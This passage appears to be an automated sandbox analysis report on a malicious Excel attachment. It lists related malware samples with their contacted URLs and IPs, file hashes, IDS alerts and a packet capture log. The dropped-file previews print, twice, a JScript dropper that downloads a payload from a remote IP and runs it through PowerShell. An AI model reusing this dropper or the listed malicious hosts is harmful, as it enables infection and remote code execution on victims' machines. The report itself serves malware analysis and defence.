                  java_update.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                  • ip-api.com/line/?fields=hosting
                  Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                  • ip-api.com/json/
                  x433.exeGet hashmaliciousXWormBrowse
                  • ip-api.com/line/?fields=hosting
                  DriverUpdt.exeGet hashmaliciousXWormBrowse
                  • ip-api.com/line/?fields=hosting
                  rinvoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • ip-api.com/line/?fields=hosting
                  188.114.96.3Vg46FzGtNo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                  • 000366cm.nyashka.top/phpflowergenerator.php
                  QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • filetransfer.io/data-package/mHgyHEv5/download
                  file.exeGet hashmaliciousFormBookBrowse
                  • www.cavetta.org.mt/yhnb/
                  http://johnlewisfr.comGet hashmaliciousUnknownBrowse
                  • johnlewisfr.com/
                  cL7A9wGE3w.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                  • 445798cm.nyashka.top/ProviderEternalLinephpRequestSecurePacketprocessauthwordpress.php
                  http://www.youkonew.anakembok.de/Get hashmaliciousHTMLPhisherBrowse
                  • www.youkonew.anakembok.de/cdn-cgi/challenge-platform/h/g/jsd/r/89b98144d9c843b7
                  hnCn8gE6NH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                  • yenot.top/providerlowAuthApibigloadprotectflower.php
                  288292021 ABB.exeGet hashmaliciousFormBookBrowse
                  • www.oc7o0.top/2zff/?Hp=4L8xoD0W4Zo4sy87CvwWXXlmZfhaBYNiZZOBxyE5jHDJEgkxN8cq+PG6NIXzy1XRCqQIvL5VyJCknvUNNLKk6zzmBcbZOQR3Nr9VCMayuUBptQdoGcq8y485hKv0f5POEUdLprTAYpXY&5H=CtUlKhgP42a
                  eiqj38BeRo.rtfGet hashmaliciousFormBookBrowse
                  • www.liposuctionclinics2.today/btrd/?OR-TJfQ=g2Awi9g0RhXmDXdNu5BlCrpPGRTrEfCXfESYZTVa1wMirmNXITW5szlP5E4EhRYb22U+Mw==&2dc=kvXd-rKHCF
                  Purchase Order -JJ023639-PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • filetransfer.io/data-package/9a4iHwft/download
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  ip-api.comKWOTASIE.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  ServerManager.exeGet hashmaliciousXWormBrowse
                  • 208.95.112.1
                  MicrosoftService.exeGet hashmaliciousXWormBrowse
                  • 208.95.112.1
                  F.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                  • 208.95.112.1
                  x.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                  • 208.95.112.1
                  java_update.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                  • 208.95.112.1
                  Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                  • 208.95.112.1
                  x433.exeGet hashmaliciousXWormBrowse
                  • 208.95.112.1
                  DriverUpdt.exeGet hashmaliciousXWormBrowse
                  • 208.95.112.1
                  rinvoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 208.95.112.1
                  uploaddeimagens.com.brFedEx Receipt_53065724643.xlsGet hashmaliciousFormBookBrowse
                  • 188.114.96.3
                  zahtjev za ponudu.xlsGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtfGet hashmaliciousRemcosBrowse
                  • 188.114.96.3
                  SecuriteInfo.com.Exploit.ShellCode.69.25469.24539.rtfGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  gFTk7fAh55.rtfGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  Comprobante_786765456776780879878968.vbsGet hashmaliciousAgentTeslaBrowse
                  • 188.114.97.3
                  Product Inquiry_#466788.xlsGet hashmaliciousFormBookBrowse
                  • 188.114.96.3
                  lista de cotizaciones.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 188.114.96.3
                  SC_TR20240619.xlsGet hashmaliciousAgentTeslaBrowse
                  • 188.114.97.3
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUShttps://128.165.205.92.host.secureserver.net/Get hashmaliciousHTMLPhisherBrowse
                  • 1.1.1.1
                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousGuLoaderBrowse
                  • 104.26.13.205
                  JDownloaderSetup.exeGet hashmaliciousUnknownBrowse
                  • 104.16.148.130
                  JDownloaderSetup.exeGet hashmaliciousUnknownBrowse
                  • 104.16.148.130
                  FedEx Receipt_53065724643.xlsGet hashmaliciousFormBookBrowse
                  • 188.114.96.3
                  SecuriteInfo.com.Win32.Evo-gen.6791.6790.exeGet hashmaliciousPython Stealer, CStealer, XmrigBrowse
                  • 104.26.2.16
                  http://differentia.ruGet hashmaliciousUnknownBrowse
                  • 172.67.71.89
                  Attendance list.exeGet hashmaliciousFormBookBrowse
                  • 172.67.210.102
                  https://guardianesdelbosque.orgGet hashmaliciousUnknownBrowse
                  • 104.22.50.131
                  mirai.mips.elfGet hashmaliciousMiraiBrowse
                  • 162.159.162.231
                  AS-COLOCROSSINGUSORDER-7019-2024.jsGet hashmaliciousAgentTeslaBrowse
                  • 192.210.215.11
                  PO-24701248890.jsGet hashmaliciousWSHRatBrowse
                  • 192.210.215.11
                  FedEx Receipt_53065724643.xlsGet hashmaliciousFormBookBrowse
                  • 23.95.235.16
                  statement .xlsGet hashmaliciousUnknownBrowse
                  • 23.95.235.16
                  EY8qnRKXcx.rtfGet hashmaliciousLokibotBrowse
                  • 198.46.178.137
                  Scan_Hsbc_Payment_advice.xlsGet hashmaliciousLokibotBrowse
                  • 198.46.178.137
                  rPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
                  • 192.227.175.142
                  cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                  • 107.173.4.18
                  INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                  • 192.210.214.9
                  INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                  • 192.210.214.9
                  TUT-ASUSKWOTASIE.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  ServerManager.exeGet hashmaliciousXWormBrowse
                  • 208.95.112.1
                  MicrosoftService.exeGet hashmaliciousXWormBrowse
                  • 208.95.112.1
                  F.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                  • 208.95.112.1
                  x.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                  • 208.95.112.1
                  java_update.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                  • 208.95.112.1
                  Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                  • 208.95.112.1
                  x433.exeGet hashmaliciousXWormBrowse
                  • 208.95.112.1
                  DriverUpdt.exeGet hashmaliciousXWormBrowse
                  • 208.95.112.1
                  rinvoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 208.95.112.1
                  AS40676USFedEx Receipt_53065724643.xlsGet hashmaliciousFormBookBrowse
                  • 41.216.183.13
                  statement .xlsGet hashmaliciousUnknownBrowse
                  • 41.216.183.13
                  Lu4qSit8YR.elfGet hashmaliciousUnknownBrowse
                  • 172.107.78.124
                  SeAH RFP_24-0676#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                  • 45.61.136.239
                  zahtjev za ponudu.xlsGet hashmaliciousUnknownBrowse
                  • 41.216.183.13
                  INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 41.216.183.13
                  SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtfGet hashmaliciousRemcosBrowse
                  • 41.216.183.13
                  botx.arm6.elfGet hashmaliciousMiraiBrowse
                  • 45.35.235.155
                  jvdETd7zDg.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                  • 205.161.47.100
                  UTN RFP_24-0676#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                  • 45.61.136.239
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  05af1f5ca1b87cc9cc9b25185115607dFedEx Receipt_53065724643.xlsGet hashmaliciousFormBookBrowse
                  • 188.114.96.3
                  statement .xlsGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  Bank Slip 2.docGet hashmaliciousSnake KeyloggerBrowse
                  • 188.114.96.3
                  Scan_Hsbc_Payment_advice.xlsGet hashmaliciousLokibotBrowse
                  • 188.114.96.3
                  INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                  • 188.114.96.3
                  20240506_12082.xlsGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                  • 188.114.96.3
                  zahtjev za ponudu.xlsGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtfGet hashmaliciousRemcosBrowse
                  • 188.114.96.3
                  36f7277af969a6947a61ae0b815907a1Setup.exeGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  Setup.exeGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  paediatric neurologist medico legal 68003.jsGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  Alinco Pipe Supply FE Product Specification & Drawing DESIGN.xlsGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  Product Inquiry_#466788.xlsGet hashmaliciousFormBookBrowse
                  • 188.114.96.3
                  Alinco Pipe Supply FE Product Specification & Drawing DESIGN.xlsGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  7YZlAbfKMg.rtfGet hashmaliciousAgentTeslaBrowse
                  • 188.114.96.3
                  Product Inquiry466789.xlsGet hashmaliciousAgentTeslaBrowse
                  • 188.114.96.3
                  fs-windows-agent-3.4.0.msiGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  PROFORMA INVOICE.xlsGet hashmaliciousRemcosBrowse
                  • 188.114.96.3
                  No context
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4760
                  Entropy (8bit):4.834060479684549
                  Encrypted:false
                  SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                  MD5:838C1F472806CF4BA2A9EC49C27C2847
                  SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                  SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                  SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):0.34726597513537405
                  Encrypted:false
                  SSDEEP:3:Nlll:Nll
                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:@...e...........................................................
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1002
                  Entropy (8bit):3.6303480533812205
                  Encrypted:false
                  SSDEEP:24:QqigCHl30+q+RYlIAdkkN0YAWOYlg62qv:XzCHV0D0IIGkkKIg62qv
                  MD5:9C088DEAB0C83A4FA69EB7D0DB5EA406
                  SHA1:0A1AAE72DE6EBAFF98C48653CCD9EB7C1B02580F
                  SHA-256:16691D927B5DC623CBAD67853DA2BD7399824B823909911AD494099C2683AD80
                  SHA-512:09BC360F1C7D62148BF6629634BFD2A4E6907C7CAF2256660B41039580051325DC818C6DC75E1A758B372D8921145335BA77C47D7BA19A0C14674E8970A56C71
                  Malicious:false
                  Reputation:low
                  Preview:..v.a.r. .n.u.b.l.a.r.,. .p.a.c.h.o.u.c.h.a.d.a.,. .c.o.n.s.t.i.t.u.c.i.o.n.a.l.,. .c.o.m.m.a.n.d.;.....n.u.b.l.a.r. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).;.....n.u.b.l.a.r...o.p.e.n.(.".G.E.T.".,. .".h.t.t.p.:././.4.1...2.1.6...1.8.3...1.3./.U.s.e.r.s._.A.P.I./.B.r.a.i.n.i.a.c.M.A.X./.f.i.l.e._.r.k.w.g.r.f.j.w...g.0.i...t.x.t.".,. .f.a.l.s.e.).;.....n.u.b.l.a.r...s.e.n.d.(.).;.........i.f. .(.n.u.b.l.a.r...s.t.a.t.u.s. .=.=.=. .2.0.0.). .{..... . . . .p.a.c.h.o.u.c.h.a.d.a. .=. .n.u.b.l.a.r...r.e.s.p.o.n.s.e.T.e.x.t.;..... . . . .c.o.n.s.t.i.t.u.c.i.o.n.a.l. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".).;..... . . . .c.o.c.h.i.l.a. .=. .".p.o.w.e.r.s.h.e.l.l. .-.C.o.m.m.a.n.d. .\.".". .+. .p.a.c.h.o.u.c.h.a.d.a. .+. .".\.".".;..... . . . .c.o.n.s.t.i.t.u.c.i.o.n.a.l...R.u.n.(.c.o.c.h.i.l.a.,. .0.,. .t.r.u.e.).;..... . . . .c.o.n.s.t.i.t.u.c.i.o.n.a.l. .=. .n.u.l.l.;.....}.........n.u.b.l.a.r. .=. .n.u.l.l.;...
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1002
                  Entropy (8bit):3.6303480533812205
                  Encrypted:false
                  SSDEEP:24:QqigCHl30+q+RYlIAdkkN0YAWOYlg62qv:XzCHV0D0IIGkkKIg62qv
                  MD5:9C088DEAB0C83A4FA69EB7D0DB5EA406
                  SHA1:0A1AAE72DE6EBAFF98C48653CCD9EB7C1B02580F
                  SHA-256:16691D927B5DC623CBAD67853DA2BD7399824B823909911AD494099C2683AD80
                  SHA-512:09BC360F1C7D62148BF6629634BFD2A4E6907C7CAF2256660B41039580051325DC818C6DC75E1A758B372D8921145335BA77C47D7BA19A0C14674E8970A56C71
                  Malicious:true
                  Preview:..v.a.r. .n.u.b.l.a.r.,. .p.a.c.h.o.u.c.h.a.d.a.,. .c.o.n.s.t.i.t.u.c.i.o.n.a.l.,. .c.o.m.m.a.n.d.;.....n.u.b.l.a.r. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).;.....n.u.b.l.a.r...o.p.e.n.(.".G.E.T.".,. .".h.t.t.p.:././.4.1...2.1.6...1.8.3...1.3./.U.s.e.r.s._.A.P.I./.B.r.a.i.n.i.a.c.M.A.X./.f.i.l.e._.r.k.w.g.r.f.j.w...g.0.i...t.x.t.".,. .f.a.l.s.e.).;.....n.u.b.l.a.r...s.e.n.d.(.).;.........i.f. .(.n.u.b.l.a.r...s.t.a.t.u.s. .=.=.=. .2.0.0.). .{..... . . . .p.a.c.h.o.u.c.h.a.d.a. .=. .n.u.b.l.a.r...r.e.s.p.o.n.s.e.T.e.x.t.;..... . . . .c.o.n.s.t.i.t.u.c.i.o.n.a.l. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".).;..... . . . .c.o.c.h.i.l.a. .=. .".p.o.w.e.r.s.h.e.l.l. .-.C.o.m.m.a.n.d. .\.".". .+. .p.a.c.h.o.u.c.h.a.d.a. .+. .".\.".".;..... . . . .c.o.n.s.t.i.t.u.c.i.o.n.a.l...R.u.n.(.c.o.c.h.i.l.a.,. .0.,. .t.r.u.e.).;..... . . . .c.o.n.s.t.i.t.u.c.i.o.n.a.l. .=. .n.u.l.l.;.....}.........n.u.b.l.a.r. .=. .n.u.l.l.;...
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):165
                  Entropy (8bit):1.4377382811115937
                  Encrypted:false
                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                  MD5:797869BB881CFBCDAC2064F92B26E46F
                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                  Malicious:false
                  Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):165
                  Entropy (8bit):1.4377382811115937
                  Encrypted:false
                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                  MD5:797869BB881CFBCDAC2064F92B26E46F
                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                  Malicious:true
                  Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  File type:Microsoft Excel 2007+
                  Entropy (8bit):7.997907351615172
                  TrID:
                  • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                  • ZIP compressed archive (8000/1) 16.67%
                  File name:orden de compra.xlam.xlsx
                  File size:708'514 bytes
                  MD5:2f9a02c106854721a8c4fbdef77e6bd1
                  SHA1:626be0171e875f0be6a67e72c92e2c0bd190d51c
                  SHA256:b053d32b3179667b0f2ecfbd8ef2ba4ea80e0ed27106847282b72a3778ada68f
                  SHA512:767a4b730a7c4ec6edb847d361c09f1e49cce9eb11eb6ff161f9e7c50dceab5c3d7cc5ae7513d7f83a11d1c7bf828535d610809082fab1d1fdfd5610a510f973
                  SSDEEP:12288:lRNuf1IdkWv18DHFq/ObhZqxPWcbuttAVQt7mLAX3gXP0nKE3UUd64bMNN8mJ0A3:l3ufhWvSDHFK6ZQ7yhQLkSsZkUd6YiFx
                  TLSH:4FE433B6B764EAAEEE6C052283FCF6C200447706C1978BF64772F94A17C39D0E609675
                  File Content Preview:PK...........X........>.......[Content_Types].xmlUT......f...f...f..MO.0...H.."_Q....j....#.....{...K....~.)p@...K.x.}..x....]..L6.N...h0.hl.w...M.[4T .p1`'6H......q...V......G)...@2&.......g...z.sT?'._J.P0..T.q>....\i..^.V...h......H.Y...j..;J.B...sha..r
                  Icon Hash:2562ab89a7b7bfbf
                  Document Type:OpenXML
                  Number of OLE Files:1
                  Has Summary Info:
                  Application Name:
                  Encrypted Document:False
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:False
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:False
                  Flash Objects Count:0
                  Contains VBA Macros:False
                  Author:USER
                  Last Saved By:USER
                  Create Time:2023-08-03T11:34:29Z
                  Last Saved Time:2023-08-03T11:37:28Z
                  Creating Application:Microsoft Excel
                  Security:0
                  Thumbnail Scaling Desired:false
                  Company:
                  Contains Dirty Links:false
                  Shared Document:false
                  Changed Hyperlinks:false
                  Application Version:16.0300
                  General
                  Stream Path:\x1Ole10NAtIvE
                  CLSID:
                  File Type:data
                  Stream Size:969905
                  Entropy:5.971361750320773
                  Base64 Encoded:False
                  Data ASCII:. . . 4 G . . . 5 . O . + , X ' ? a . U . S q ' > . . c . A . . c @ G . . . . U D . @ G S . . . 4 9 # . t w . Y . A Q . l % @ # w S } t . . . . d . B . 4 . h s ? , $ D | " 4 $ . h u . B 3 J N L ] d & } ; . : . f # Q . . X Z a * u q . . W . * I r b . 5 / . [ . X C + ; k : & . C . " * . j ; . R U . J b k . 8 1 ' P . > S . { G 3 i + . Y . h N . . . U . @ R 3 . C & ] . N . . z . . 6 . @ g % z . j ) c E : M . n . X 0 W . ) * * J # ' a . z l ' 5 X H P % y . C = _ _ ! . A . 6 8 A r I < ! y ( . . r e . M ` z d
                  Data Raw:a8 ee ed 04 03 00 9a a6 34 47 01 08 f5 8b b8 f8 b8 0a 89 35 c4 05 4f 89 8b 18 8b 2b ba 2c 58 27 92 81 f2 9c 3f 61 92 8b 1a 55 ff d3 05 53 71 27 3e 05 de 8f d8 c1 ff e0 63 0e c6 e5 41 00 fc 04 63 40 9b 47 ad 85 ee 15 12 03 f5 f5 97 ee b2 80 c6 55 9f e7 e0 b1 cf 44 ae 8d bb 13 fc 40 a1 47 53 09 08 df 88 80 34 39 ac da 23 d4 82 fe 74 85 77 10 a7 59 c7 be 41 51 dc 1a a5 f8 6c 25 40 23
                  General
                  Stream Path:Q4hZNdx631mzXJuoiAUv0dO
                  CLSID:
                  File Type:empty
                  Stream Size:0
                  Entropy:0.0
                  Base64 Encoded:False
                  Data ASCII:
                  Data Raw:
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  07/02/24-08:22:17.801189TCP2020425ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 3 M18049167192.3.243.156192.168.2.22
                  07/02/24-08:22:11.705623TCP2049038ET TROJAN Malicious Base64 Encoded Payload In Image804916241.216.183.13192.168.2.22
                  07/02/24-08:22:15.357221TCP2020425ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 3 M18049164192.3.243.156192.168.2.22
                  TimestampSource PortDest PortSource IPDest IP
                  Jul 2, 2024 08:22:09.851629019 CEST4916180192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:09.856641054 CEST8049161192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:09.856702089 CEST4916180192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:09.856952906 CEST4916180192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:09.861815929 CEST8049161192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:10.441570997 CEST8049161192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:10.441664934 CEST4916180192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:11.004380941 CEST4916280192.168.2.2241.216.183.13
                  Jul 2, 2024 08:22:11.010512114 CEST804916241.216.183.13192.168.2.22
                  Jul 2, 2024 08:22:11.010612011 CEST4916280192.168.2.2241.216.183.13
                  Jul 2, 2024 08:22:11.011322021 CEST4916280192.168.2.2241.216.183.13
                  Jul 2, 2024 08:22:11.016196966 CEST804916241.216.183.13192.168.2.22
                  Jul 2, 2024 08:22:11.705590010 CEST804916241.216.183.13192.168.2.22
                  Jul 2, 2024 08:22:11.705612898 CEST804916241.216.183.13192.168.2.22
                  Jul 2, 2024 08:22:11.705622911 CEST804916241.216.183.13192.168.2.22
                  Jul 2, 2024 08:22:11.705672979 CEST4916280192.168.2.2241.216.183.13
                  Jul 2, 2024 08:22:11.705746889 CEST804916241.216.183.13192.168.2.22
                  Jul 2, 2024 08:22:11.919759989 CEST804916241.216.183.13192.168.2.22
                  Jul 2, 2024 08:22:11.919821024 CEST4916280192.168.2.2241.216.183.13
                  Jul 2, 2024 08:22:12.099046946 CEST4916180192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:13.278301001 CEST49163443192.168.2.22188.114.96.3
                  Jul 2, 2024 08:22:13.278342962 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.278402090 CEST49163443192.168.2.22188.114.96.3
                  Jul 2, 2024 08:22:13.286984921 CEST49163443192.168.2.22188.114.96.3
                  Jul 2, 2024 08:22:13.287013054 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.765677929 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.765772104 CEST49163443192.168.2.22188.114.96.3
                  Jul 2, 2024 08:22:13.772794008 CEST49163443192.168.2.22188.114.96.3
                  Jul 2, 2024 08:22:13.772809982 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.773128033 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.852530956 CEST49163443192.168.2.22188.114.96.3
                  Jul 2, 2024 08:22:13.896502018 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.957319021 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.957355976 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.957391977 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.957407951 CEST49163443192.168.2.22188.114.96.3
                  Jul 2, 2024 08:22:13.957415104 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.957423925 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.957456112 CEST49163443192.168.2.22188.114.96.3
                  Jul 2, 2024 08:22:13.957890034 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.957989931 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.958029032 CEST49163443192.168.2.22188.114.96.3
                  Jul 2, 2024 08:22:13.958039045 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.958750010 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.958796978 CEST49163443192.168.2.22188.114.96.3
                  Jul 2, 2024 08:22:13.958802938 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.959474087 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:13.959517002 CEST49163443192.168.2.22188.114.96.3
                  Jul 2, 2024 08:22:13.959522963 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:14.046528101 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:14.046598911 CEST49163443192.168.2.22188.114.96.3
                  Jul 2, 2024 08:22:14.046622992 CEST44349163188.114.96.3192.168.2.22
                  Jul 2, 2024 08:22:14.046750069 CEST44349163188.114.96.3192.168.2.22
